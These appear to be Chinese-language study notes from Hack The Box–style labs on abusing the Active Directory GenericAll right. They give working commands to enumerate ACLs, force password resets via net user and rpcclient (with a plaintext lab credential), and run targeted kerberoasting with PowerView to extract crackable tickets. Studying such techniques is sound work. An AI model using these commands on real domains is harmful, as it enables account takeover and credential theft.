GenericAll 是什么？

GenericAll 权限是 Windows 安全模型中的一种访问控制权限，它赋予持有者对某个对象的完全控制权。这意味着持有 GenericAll 权限的用户可以对该对象执行所有可能的操作，包括读取、写入、删除和修改权限等。、

在 Windows 中，每个对象（如文件、文件夹、注册表项、AD 对象等）都具有一个访问控制列表（ACL），该列表定义了哪些用户或组可以对该对象执行哪些操作。GenericAll 权限是一个通用的权限集，表示对对象的完全控制权。

怎么找到 它？

在 windows 中 获取 Active Directory 对象的 权限

get-acl -path ‘AD:\CN=adad,CN=Managed Service Accounts,DC=wujiao,DC=com’ | Format-List

(get-acl -path ‘AD:\CN=adad,CN=Managed Service Accounts,DC=wujiao,DC=com’).access 查看用户权限

查看用户的权限

dsquery user 用于查询活动目录中的对象（用户）

dsget user “CN=adad,CN=Managed Service Accounts,DC=wujiao,DC=com” -memberof -expand 查看用户所在组

- "CN=jdgodd,CN=users,DC=streamio,DC=htb":
    
    - 这是用户对象的 LDAP（轻量目录访问协议）路径。它标识了特定的用户对象，包含以下部分：
        - **CN=jdgodd**: 用户的常见名称 (Common Name)。
        - **CN=users**: 用户容器的常见名称，表示该用户在 `users` 容器中。
        - **DC=streamio,DC=htb**: 域组件，表示域名为 `streamio.htb`。
- -memberof:
    
    - 这个参数指示命令返回指定用户的直接成员身份，即用户所属的组列表。
- -expand:
    
    - 这个参数指示命令返回用户的递归成员身份。也就是说，它不仅返回用户直接所属的组，还返回用户所在组的上级组，直到所有相关的组都列出。

get-adgroup ‘Schema Admins’ 查看组信息

(get-acl “ad:\CN=Schema Admins,CN=Users,DC=wujiao,DC=com”).access | Where-Object {$_.IdentityReference -like “WUJIAO\Domain Admins”} 查看组的权限

怎么使用它？

1.直接 使用 net user ad P@ssw0rd 改用户的密码

rpcclient 连接 rpc（修改密码）

rpcclient -U ‘jari%Cos@Chung@!RPG’ 10.10.10.240
setuserinfo2 gibdeon 23 ‘P@ssw0ry’ ，修改密码 
crackmapexec smb 10.10.10.240 -u ‘GIBDEON’ -p ‘P@ssw0rw’ 验证结果

什么是spn？

服务主体名称（SPN）概述：
定义：SPN 是一个唯一标识符，它标识了在网络上运行的服务的身份。在 Windows 环境中，通常用于 Kerberos 认证协议。

用途：SPN 允许客户端请求 Kerberos 票证，用于与服务进行安全通信。例如，HTTP 服务的 SPN 可能是 HTTP/server.example.com。

关联对象：SPN 通常与服务账户（如计算机账户或服务账户）关联。它不应该与普通用户账户关联，因为普通用户通常不提供服务

设置spn 获取tgt然后破解凭据

使用PowerView 的功能设置用户的 SPN 并检索他的 TGT

这个 PowerShell 脚本利用 PowerView 模块来设置一个用户的 Service Principal Name (SPN)，并获取该 SPN 的 Kerberos 票证，以便通过 Hashcat 进行离线破解。

import-module .\PowerView.ps1
Set-DomainObject  -Identity  DR.ZAIUSS -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
Get-DomainUser -Identity DR.ZAIUSS -SPN | Get-DomainSPNTicket -OutputFormat Hashcat